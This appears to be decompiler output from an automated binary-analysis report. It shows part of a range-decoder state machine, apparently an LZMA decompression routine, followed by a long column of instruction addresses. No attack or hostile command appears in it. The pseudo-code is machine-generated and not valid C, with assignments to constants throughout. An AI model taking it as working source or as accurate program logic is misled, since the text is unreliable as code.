                                                                                      							goto L140;
                                                                                      						case 0x15:
                                                                                      							__eax = 0;
                                                                                      							__eflags =  *(__ebp - 0x38) - 7;
                                                                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      							__al = __al & 0x000000fd;
                                                                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                      							goto L120;
                                                                                      						case 0x16:
                                                                                      							__eax =  *(__ebp - 0x30);
                                                                                      							__eflags = __eax - 4;
                                                                                      							if(__eax >= 4) {
                                                                                      								_push(3);
                                                                                      								_pop(__eax);
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 4);
                                                                                      							 *(__ebp - 0x40) = 6;
                                                                                      							__eax = __eax << 7;
                                                                                      							 *(__ebp - 0x7c) = 0x19;
                                                                                      							 *(__ebp - 0x58) = __eax;
                                                                                      							goto L145;
                                                                                      						case 0x17:
                                                                                      							L145:
                                                                                      							__eax =  *(__ebp - 0x40);
                                                                                      							 *(__ebp - 0x50) = 1;
                                                                                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                      							goto L149;
                                                                                      						case 0x18:
                                                                                      							L146:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0x18;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t484 = __ebp - 0x70;
                                                                                      							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t484;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							L148:
                                                                                      							_t487 = __ebp - 0x48;
                                                                                      							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                      							__eflags =  *_t487;
                                                                                      							L149:
                                                                                      							__eflags =  *(__ebp - 0x48);
                                                                                      							if( *(__ebp - 0x48) <= 0) {
                                                                                      								__ecx =  *(__ebp - 0x40);
                                                                                      								__ebx =  *(__ebp - 0x50);
                                                                                      								0 = 1;
                                                                                      								__eax = 1 << __cl;
                                                                                      								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                      								__eax =  *(__ebp - 0x7c);
                                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                                      								goto L140;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x50);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      							__eax =  *(__ebp - 0x58);
                                                                                      							__esi = __edx + __eax;
                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                      							__ax =  *__esi;
                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      								__cx = __ax;
                                                                                      								__cx = __ax >> 5;
                                                                                      								__eax = __eax - __ecx;
                                                                                      								__edx = __edx + 1;
                                                                                      								__eflags = __edx;
                                                                                      								 *__esi = __ax;
                                                                                      								 *(__ebp - 0x50) = __edx;
                                                                                      							} else {
                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                      								0x800 = 0x800 - __edi;
                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      								 *__esi = __cx;
                                                                                      							}
                                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      								goto L148;
                                                                                      							} else {
                                                                                      								goto L146;
                                                                                      							}
                                                                                      						case 0x19:
                                                                                      							__eflags = __ebx - 4;
                                                                                      							if(__ebx < 4) {
                                                                                      								 *(__ebp - 0x2c) = __ebx;
                                                                                      								L119:
                                                                                      								_t393 = __ebp - 0x2c;
                                                                                      								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                      								__eflags =  *_t393;
                                                                                      								L120:
                                                                                      								__eax =  *(__ebp - 0x2c);
                                                                                      								__eflags = __eax;
                                                                                      								if(__eax == 0) {
                                                                                      									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                      									goto L170;
                                                                                      								}
                                                                                      								__eflags = __eax -  *(__ebp - 0x60);
                                                                                      								if(__eax >  *(__ebp - 0x60)) {
                                                                                      									goto L171;
                                                                                      								}
                                                                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                      								__eax =  *(__ebp - 0x30);
                                                                                      								_t400 = __ebp - 0x60;
                                                                                      								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                      								__eflags =  *_t400;
                                                                                      								goto L123;
                                                                                      							}
                                                                                      							__ecx = __ebx;
                                                                                      							__eax = __ebx;
                                                                                      							__ecx = __ebx >> 1;
                                                                                      							__eax = __ebx & 0x00000001;
                                                                                      							__ecx = (__ebx >> 1) - 1;
                                                                                      							__al = __al | 0x00000002;
                                                                                      							__eax = (__ebx & 0x00000001) << __cl;
                                                                                      							__eflags = __ebx - 0xe;
                                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                                      							if(__ebx >= 0xe) {
                                                                                      								__ebx = 0;
                                                                                      								 *(__ebp - 0x48) = __ecx;
                                                                                      								L102:
                                                                                      								__eflags =  *(__ebp - 0x48);
                                                                                      								if( *(__ebp - 0x48) <= 0) {
                                                                                      									__eax = __eax + __ebx;
                                                                                      									 *(__ebp - 0x40) = 4;
                                                                                      									 *(__ebp - 0x2c) = __eax;
                                                                                      									__eax =  *(__ebp - 4);
                                                                                      									__eax =  *(__ebp - 4) + 0x644;
                                                                                      									__eflags = __eax;
                                                                                      									L108:
                                                                                      									__ebx = 0;
                                                                                      									 *(__ebp - 0x58) = __eax;
                                                                                      									 *(__ebp - 0x50) = 1;
                                                                                      									 *(__ebp - 0x44) = 0;
                                                                                      									 *(__ebp - 0x48) = 0;
                                                                                      									L112:
                                                                                      									__eax =  *(__ebp - 0x40);
                                                                                      									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                      										_t391 = __ebp - 0x2c;
                                                                                      										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                      										__eflags =  *_t391;
                                                                                      										goto L119;
                                                                                      									}
                                                                                      									__eax =  *(__ebp - 0x50);
                                                                                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      									__eax =  *(__ebp - 0x58);
                                                                                      									__esi = __edi + __eax;
                                                                                      									 *(__ebp - 0x54) = __esi;
                                                                                      									__ax =  *__esi;
                                                                                      									__ecx = __ax & 0x0000ffff;
                                                                                      									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                      									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                      									if( *(__ebp - 0xc) >= __edx) {
                                                                                      										__ecx = 0;
                                                                                      										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                      										__ecx = 1;
                                                                                      										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                      										__ebx = 1;
                                                                                      										__ecx =  *(__ebp - 0x48);
                                                                                      										__ebx = 1 << __cl;
                                                                                      										__ecx = 1 << __cl;
                                                                                      										__ebx =  *(__ebp - 0x44);
                                                                                      										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                      										__cx = __ax;
                                                                                      										__cx = __ax >> 5;
                                                                                      										__eax = __eax - __ecx;
                                                                                      										__edi = __edi + 1;
                                                                                      										__eflags = __edi;
                                                                                      										 *(__ebp - 0x44) = __ebx;
                                                                                      										 *__esi = __ax;
                                                                                      										 *(__ebp - 0x50) = __edi;
                                                                                      									} else {
                                                                                      										 *(__ebp - 0x10) = __edx;
                                                                                      										0x800 = 0x800 - __ecx;
                                                                                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                      										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      										 *__esi = __dx;
                                                                                      									}
                                                                                      									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      										L111:
                                                                                      										_t368 = __ebp - 0x48;
                                                                                      										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                      										__eflags =  *_t368;
                                                                                      										goto L112;
                                                                                      									} else {
                                                                                      										goto L109;
                                                                                      									}
                                                                                      								}
                                                                                      								__ecx =  *(__ebp - 0xc);
                                                                                      								__ebx = __ebx + __ebx;
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                      								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                                      								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                      									__ecx =  *(__ebp - 0x10);
                                                                                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      									__ebx = __ebx | 0x00000001;
                                                                                      									__eflags = __ebx;
                                                                                      									 *(__ebp - 0x44) = __ebx;
                                                                                      								}
                                                                                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      									L101:
                                                                                      									_t338 = __ebp - 0x48;
                                                                                      									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                      									__eflags =  *_t338;
                                                                                      									goto L102;
                                                                                      								} else {
                                                                                      									goto L99;
                                                                                      								}
                                                                                      							}
                                                                                      							__edx =  *(__ebp - 4);
                                                                                      							__eax = __eax - __ebx;
                                                                                      							 *(__ebp - 0x40) = __ecx;
                                                                                      							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                      							goto L108;
                                                                                      						case 0x1a:
                                                                                      							L56:
                                                                                      							__eflags =  *(__ebp - 0x64);
                                                                                      							if( *(__ebp - 0x64) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0x1a;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x68);
                                                                                      							__al =  *(__ebp - 0x5c);
                                                                                      							__edx =  *(__ebp - 8);
                                                                                      							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      							 *( *(__ebp - 0x68)) = __al;
                                                                                      							__ecx =  *(__ebp - 0x14);
                                                                                      							 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                      							__eax = __ecx + 1;
                                                                                      							__edx = 0;
                                                                                      							_t192 = __eax %  *(__ebp - 0x74);
                                                                                      							__eax = __eax /  *(__ebp - 0x74);
                                                                                      							__edx = _t192;
                                                                                      							goto L79;
                                                                                      						case 0x1b:
                                                                                      							goto L75;
                                                                                      						case 0x1c:
                                                                                      							while(1) {
                                                                                      								L123:
                                                                                      								__eflags =  *(__ebp - 0x64);
                                                                                      								if( *(__ebp - 0x64) == 0) {
                                                                                      									break;
                                                                                      								}
                                                                                      								__eax =  *(__ebp - 0x14);
                                                                                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      								__eflags = __eax -  *(__ebp - 0x74);
                                                                                      								if(__eax >=  *(__ebp - 0x74)) {
                                                                                      									__eax = __eax +  *(__ebp - 0x74);
                                                                                      									__eflags = __eax;
                                                                                      								}
                                                                                      								__edx =  *(__ebp - 8);
                                                                                      								__cl =  *(__eax + __edx);
                                                                                      								__eax =  *(__ebp - 0x14);
                                                                                      								 *(__ebp - 0x5c) = __cl;
                                                                                      								 *(__eax + __edx) = __cl;
                                                                                      								__eax = __eax + 1;
                                                                                      								__edx = 0;
                                                                                      								_t414 = __eax %  *(__ebp - 0x74);
                                                                                      								__eax = __eax /  *(__ebp - 0x74);
                                                                                      								__edx = _t414;
                                                                                      								__eax =  *(__ebp - 0x68);
                                                                                      								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                      								__eflags =  *(__ebp - 0x30);
                                                                                      								 *( *(__ebp - 0x68)) = __cl;
                                                                                      								 *(__ebp - 0x14) = _t414;
                                                                                      								if( *(__ebp - 0x30) > 0) {
                                                                                      									continue;
                                                                                      								} else {
                                                                                      									goto L80;
                                                                                      								}
                                                                                      							}
                                                                                      							 *(__ebp - 0x88) = 0x1c;
                                                                                      							goto L170;
                                                                                      					}
                                                                                      				}
                                                                                      			}













                                                                                      0x00000000
                                                                                      0x00406fa7
                                                                                      0x00406fa7
                                                                                      0x00406fab
                                                                                      0x00407062
                                                                                      0x00407065
                                                                                      0x00407071
                                                                                      0x00406f52
                                                                                      0x00406f52
                                                                                      0x00406f55
                                                                                      0x004072c7
                                                                                      0x004072c7
                                                                                      0x004072ca
                                                                                      0x004072ca
                                                                                      0x004072d0
                                                                                      0x004072d6
                                                                                      0x004072dc
                                                                                      0x004072f6
                                                                                      0x004072f9
                                                                                      0x004072ff
                                                                                      0x0040730a
                                                                                      0x0040730c
                                                                                      0x004072de
                                                                                      0x004072de
                                                                                      0x004072ed
                                                                                      0x004072f1
                                                                                      0x004072f1
                                                                                      0x00407316
                                                                                      0x0040733d
                                                                                      0x0040733d
                                                                                      0x00407343
                                                                                      0x00407343
                                                                                      0x00000000
                                                                                      0x00407318
                                                                                      0x00407318
                                                                                      0x0040731c
                                                                                      0x004074cb
                                                                                      0x00000000
                                                                                      0x004074cb
                                                                                      0x00407328
                                                                                      0x0040732f
                                                                                      0x00407337
                                                                                      0x0040733a
                                                                                      0x00000000
                                                                                      0x0040733a
                                                                                      0x00406fb1
                                                                                      0x00406fb5
                                                                                      0x004074f6
                                                                                      0x004074f6
                                                                                      0x004074f9
                                                                                      0x004074fd
                                                                                      0x004074fd
                                                                                      0x00406fbb
                                                                                      0x00406fc1
                                                                                      0x00406fc4
                                                                                      0x00406fc8
                                                                                      0x00406fcb
                                                                                      0x00406fcf
                                                                                      0x00407495
                                                                                      0x004074e1
                                                                                      0x004074e9
                                                                                      0x004074f0
                                                                                      0x004074f2
                                                                                      0x00000000
                                                                                      0x004074f2
                                                                                      0x00406fd5
                                                                                      0x00406fd8
                                                                                      0x00406fde
                                                                                      0x00406fe0
                                                                                      0x00406fe0
                                                                                      0x00406fe3
                                                                                      0x00406fe6
                                                                                      0x00406fe9
                                                                                      0x00406fec
                                                                                      0x00406fef
                                                                                      0x00406ff2
                                                                                      0x00406ff3
                                                                                      0x00406ff5
                                                                                      0x00406ff5
                                                                                      0x00406ff5
                                                                                      0x00406ff8
                                                                                      0x00406ffb
                                                                                      0x00406ffe
                                                                                      0x00407001
                                                                                      0x00407001
                                                                                      0x00407004
                                                                                      0x00407006
                                                                                      0x00407006
                                                                                      0x00407009
                                                                                      0x00407009
                                                                                      0x00407009
                                                                                      0x00406adf
                                                                                      0x00406adf
                                                                                      0x00406ae8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406aee
                                                                                      0x00000000
                                                                                      0x00406af9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b02
                                                                                      0x00406b05
                                                                                      0x00406b08
                                                                                      0x00406b0c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b12
                                                                                      0x00406b15
                                                                                      0x00406b17
                                                                                      0x00406b18
                                                                                      0x00406b1b
                                                                                      0x00406b1d
                                                                                      0x00406b1e
                                                                                      0x00406b20
                                                                                      0x00406b23
                                                                                      0x00406b28
                                                                                      0x00406b2d
                                                                                      0x00406b36
                                                                                      0x00406b49
                                                                                      0x00406b4c
                                                                                      0x00406b58
                                                                                      0x00406b80
                                                                                      0x00406b82
                                                                                      0x00406b90
                                                                                      0x00406b90
                                                                                      0x00406b94
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406b84
                                                                                      0x00406b84
                                                                                      0x00406b87
                                                                                      0x00406b88
                                                                                      0x00406b88
                                                                                      0x00000000
                                                                                      0x00406b84
                                                                                      0x00406b5e
                                                                                      0x00406b63
                                                                                      0x00406b63
                                                                                      0x00406b6c
                                                                                      0x00406b74
                                                                                      0x00406b77
                                                                                      0x00000000
                                                                                      0x00406b7d
                                                                                      0x00406b7d
                                                                                      0x00000000
                                                                                      0x00406b7d
                                                                                      0x00000000
                                                                                      0x00406b9a
                                                                                      0x00406b9a
                                                                                      0x00406b9e
                                                                                      0x0040744a
                                                                                      0x00000000
                                                                                      0x0040744a
                                                                                      0x00406ba7
                                                                                      0x00406bb7
                                                                                      0x00406bba
                                                                                      0x00406bbd
                                                                                      0x00406bbd
                                                                                      0x00406bbd
                                                                                      0x00406bc0
                                                                                      0x00406bc4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406bc6
                                                                                      0x00406bcc
                                                                                      0x00406bf6
                                                                                      0x00406bfc
                                                                                      0x00406c03
                                                                                      0x00000000
                                                                                      0x00406c03
                                                                                      0x00406bd2
                                                                                      0x00406bd5
                                                                                      0x00406bda
                                                                                      0x00406bda
                                                                                      0x00406be5
                                                                                      0x00406bed
                                                                                      0x00406bf0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c35
                                                                                      0x00406c3b
                                                                                      0x00406c3e
                                                                                      0x00406c4b
                                                                                      0x00406c53
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c0a
                                                                                      0x00406c0a
                                                                                      0x00406c0e
                                                                                      0x00407459
                                                                                      0x00000000
                                                                                      0x00407459
                                                                                      0x00406c1a
                                                                                      0x00406c25
                                                                                      0x00406c25
                                                                                      0x00406c25
                                                                                      0x00406c28
                                                                                      0x00406c2b
                                                                                      0x00406c2e
                                                                                      0x00406c33
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c5b
                                                                                      0x00406c5d
                                                                                      0x00406c60
                                                                                      0x00406cd1
                                                                                      0x00406cd4
                                                                                      0x00406cd7
                                                                                      0x00406cde
                                                                                      0x00406ce8
                                                                                      0x00000000
                                                                                      0x00406ce8
                                                                                      0x00406c62
                                                                                      0x00406c66
                                                                                      0x00406c69
                                                                                      0x00406c6b
                                                                                      0x00406c6e
                                                                                      0x00406c71
                                                                                      0x00406c73
                                                                                      0x00406c76
                                                                                      0x00406c78
                                                                                      0x00406c7d
                                                                                      0x00406c80
                                                                                      0x00406c83
                                                                                      0x00406c87
                                                                                      0x00406c8e
                                                                                      0x00406c91
                                                                                      0x00406c98
                                                                                      0x00406c9c
                                                                                      0x00406ca4
                                                                                      0x00406ca4
                                                                                      0x00406ca4
                                                                                      0x00406c9e
                                                                                      0x00406c9e
                                                                                      0x00406c9e
                                                                                      0x00406c93
                                                                                      0x00406c93
                                                                                      0x00406c93
                                                                                      0x00406ca8
                                                                                      0x00406cab
                                                                                      0x00406cc9
                                                                                      0x00406ccb
                                                                                      0x00000000
                                                                                      0x00406cad
                                                                                      0x00406cad
                                                                                      0x00406cb0
                                                                                      0x00406cb3
                                                                                      0x00406cb6
                                                                                      0x00406cb8
                                                                                      0x00406cb8
                                                                                      0x00406cb8
                                                                                      0x00406cbb
                                                                                      0x00406cbe
                                                                                      0x00406cc0
                                                                                      0x00406cc1
                                                                                      0x00406cc4
                                                                                      0x00000000
                                                                                      0x00406cc4
                                                                                      0x00000000
                                                                                      0x00406efa
                                                                                      0x00406efe
                                                                                      0x00406f1c
                                                                                      0x00406f1f
                                                                                      0x00406f26
                                                                                      0x00406f29
                                                                                      0x00406f2c
                                                                                      0x00406f2f
                                                                                      0x00406f32
                                                                                      0x00406f35
                                                                                      0x00406f37
                                                                                      0x00406f3e
                                                                                      0x00406f3f
                                                                                      0x00406f41
                                                                                      0x00406f44
                                                                                      0x00406f47
                                                                                      0x00406f4a
                                                                                      0x00406f4a
                                                                                      0x00406f4f
                                                                                      0x00000000
                                                                                      0x00406f4f
                                                                                      0x00406f00
                                                                                      0x00406f03
                                                                                      0x00406f06
                                                                                      0x00406f10
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406f64
                                                                                      0x00406f68
                                                                                      0x00406f8b
                                                                                      0x00406f8e
                                                                                      0x00406f91
                                                                                      0x00406f9b
                                                                                      0x00406f6a
                                                                                      0x00406f6a
                                                                                      0x00406f6d
                                                                                      0x00406f70
                                                                                      0x00406f73
                                                                                      0x00406f80
                                                                                      0x00406f83
                                                                                      0x00406f83
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407018
                                                                                      0x0040701c
                                                                                      0x00407023
                                                                                      0x00407026
                                                                                      0x00407029
                                                                                      0x00407033
                                                                                      0x00000000
                                                                                      0x00407033
                                                                                      0x0040701e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040703f
                                                                                      0x00407043
                                                                                      0x0040704a
                                                                                      0x0040704d
                                                                                      0x00407050
                                                                                      0x00407045
                                                                                      0x00407045
                                                                                      0x00407045
                                                                                      0x00407053
                                                                                      0x00407056
                                                                                      0x00407059
                                                                                      0x00407059
                                                                                      0x0040705c
                                                                                      0x0040705f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004070ff
                                                                                      0x004070ff
                                                                                      0x00407103
                                                                                      0x004074a1
                                                                                      0x00000000
                                                                                      0x004074a1
                                                                                      0x00407109
                                                                                      0x0040710c
                                                                                      0x0040710f
                                                                                      0x00407113
                                                                                      0x00407116
                                                                                      0x0040711c
                                                                                      0x0040711e
                                                                                      0x0040711e
                                                                                      0x0040711e
                                                                                      0x00407121
                                                                                      0x00407124
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406cf4
                                                                                      0x00406cf4
                                                                                      0x00406cf8
                                                                                      0x00407465
                                                                                      0x00000000
                                                                                      0x00407465
                                                                                      0x00406cfe
                                                                                      0x00406d01
                                                                                      0x00406d04
                                                                                      0x00406d08
                                                                                      0x00406d0b
                                                                                      0x00406d11
                                                                                      0x00406d13
                                                                                      0x00406d13
                                                                                      0x00406d13
                                                                                      0x00406d16
                                                                                      0x00406d19
                                                                                      0x00406d19
                                                                                      0x00406d1c
                                                                                      0x00406d1f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d25
                                                                                      0x00406d2b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406d31
                                                                                      0x00406d31
                                                                                      0x00406d35
                                                                                      0x00406d38
                                                                                      0x00406d3b
                                                                                      0x00406d3e
                                                                                      0x00406d41
                                                                                      0x00406d42
                                                                                      0x00406d45
                                                                                      0x00406d47
                                                                                      0x00406d4d
                                                                                      0x00406d50
                                                                                      0x00406d53
                                                                                      0x00406d56
                                                                                      0x00406d59
                                                                                      0x00406d5c
                                                                                      0x00406d5f
                                                                                      0x00406d7b
                                                                                      0x00406d7e
                                                                                      0x00406d81
                                                                                      0x00406d84
                                                                                      0x00406d8b
                                                                                      0x00406d8f
                                                                                      0x00406d91
                                                                                      0x00406d95
                                                                                      0x00406d61
                                                                                      0x00406d61
                                                                                      0x00406d65
                                                                                      0x00406d6d
                                                                                      0x00406d72
                                                                                      0x00406d74
                                                                                      0x00406d76
                                                                                      0x00406d76
                                                                                      0x00406d98
                                                                                      0x00406d9f
                                                                                      0x00406da2
                                                                                      0x00000000
                                                                                      0x00406da8
                                                                                      0x00000000
                                                                                      0x00406da8
                                                                                      0x00000000
                                                                                      0x00406dad
                                                                                      0x00406dad
                                                                                      0x00406db1
                                                                                      0x00407471
                                                                                      0x00000000
                                                                                      0x00407471
                                                                                      0x00406db7
                                                                                      0x00406dba
                                                                                      0x00406dbd
                                                                                      0x00406dc1
                                                                                      0x00406dc4
                                                                                      0x00406dca
                                                                                      0x00406dcc
                                                                                      0x00406dcc
                                                                                      0x00406dcc
                                                                                      0x00406dcf
                                                                                      0x00406dd2
                                                                                      0x00406dd2
                                                                                      0x00406dd2
                                                                                      0x00406dd8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406dda
                                                                                      0x00406ddd
                                                                                      0x00406de0
                                                                                      0x00406de3
                                                                                      0x00406de6
                                                                                      0x00406de9
                                                                                      0x00406dec
                                                                                      0x00406def
                                                                                      0x00406df2
                                                                                      0x00406df5
                                                                                      0x00406df8
                                                                                      0x00406e10
                                                                                      0x00406e13
                                                                                      0x00406e16
                                                                                      0x00406e19
                                                                                      0x00406e19
                                                                                      0x00406e1c
                                                                                      0x00406e20
                                                                                      0x00406e22
                                                                                      0x00406dfa
                                                                                      0x00406dfa
                                                                                      0x00406e02
                                                                                      0x00406e07
                                                                                      0x00406e09
                                                                                      0x00406e0b
                                                                                      0x00406e0b
                                                                                      0x00406e25
                                                                                      0x00406e2c
                                                                                      0x00406e2f
                                                                                      0x00000000
                                                                                      0x00406e31
                                                                                      0x00000000
                                                                                      0x00406e31
                                                                                      0x00406e2f
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00406e36
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406e71
                                                                                      0x00406e71
                                                                                      0x00406e75
                                                                                      0x0040747d
                                                                                      0x00000000
                                                                                      0x0040747d
                                                                                      0x00406e7b
                                                                                      0x00406e7e
                                                                                      0x00406e81
                                                                                      0x00406e85
                                                                                      0x00406e88
                                                                                      0x00406e8e
                                                                                      0x00406e90
                                                                                      0x00406e90
                                                                                      0x00406e90
                                                                                      0x00406e93
                                                                                      0x00406e96
                                                                                      0x00406e96
                                                                                      0x00406e9c
                                                                                      0x00406e3a
                                                                                      0x00406e3a
                                                                                      0x00406e3d
                                                                                      0x00000000
                                                                                      0x00406e3d
                                                                                      0x00406e9e
                                                                                      0x00406e9e
                                                                                      0x00406ea1
                                                                                      0x00406ea4
                                                                                      0x00406ea7
                                                                                      0x00406eaa
                                                                                      0x00406ead
                                                                                      0x00406eb0
                                                                                      0x00406eb3
                                                                                      0x00406eb6
                                                                                      0x00406eb9
                                                                                      0x00406ebc
                                                                                      0x00406ed4
                                                                                      0x00406ed7
                                                                                      0x00406eda
                                                                                      0x00406edd
                                                                                      0x00406edd
                                                                                      0x00406ee0
                                                                                      0x00406ee4
                                                                                      0x00406ee6
                                                                                      0x00406ebe
                                                                                      0x00406ebe
                                                                                      0x00406ec6
                                                                                      0x00406ecb
                                                                                      0x00406ecd
                                                                                      0x00406ecf
                                                                                      0x00406ecf
                                                                                      0x00406ee9
                                                                                      0x00406ef0
                                                                                      0x00406ef3
                                                                                      0x00000000
                                                                                      0x00406ef5
                                                                                      0x00000000
                                                                                      0x00406ef5
                                                                                      0x00000000
                                                                                      0x00407182
                                                                                      0x00407182
                                                                                      0x00407186
                                                                                      0x004074ad
                                                                                      0x00000000
                                                                                      0x004074ad
                                                                                      0x0040718c
                                                                                      0x0040718f
                                                                                      0x00407192
                                                                                      0x00407196
                                                                                      0x00407199
                                                                                      0x0040719f
                                                                                      0x004071a1
                                                                                      0x004071a1
                                                                                      0x004071a1
                                                                                      0x004071a4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407291
                                                                                      0x00407295
                                                                                      0x004072b7
                                                                                      0x004072ba
                                                                                      0x004072c4
                                                                                      0x00000000
                                                                                      0x004072c4
                                                                                      0x00407297
                                                                                      0x0040729a
                                                                                      0x0040729e
                                                                                      0x004072a1
                                                                                      0x004072a1
                                                                                      0x004072a4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040734e
                                                                                      0x00407352
                                                                                      0x00407370
                                                                                      0x00407370
                                                                                      0x00407370
                                                                                      0x00407377
                                                                                      0x0040737e
                                                                                      0x00407385
                                                                                      0x00407385
                                                                                      0x00000000
                                                                                      0x00407385
                                                                                      0x00407354
                                                                                      0x00407357
                                                                                      0x0040735a
                                                                                      0x0040735d
                                                                                      0x00407364
                                                                                      0x004072a8
                                                                                      0x004072a8
                                                                                      0x004072ab
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040743f
                                                                                      0x00407442
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407079
                                                                                      0x0040707b
                                                                                      0x00407082
                                                                                      0x00407083
                                                                                      0x00407085
                                                                                      0x00407088
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407090
                                                                                      0x00407093
                                                                                      0x00407096
                                                                                      0x00407098
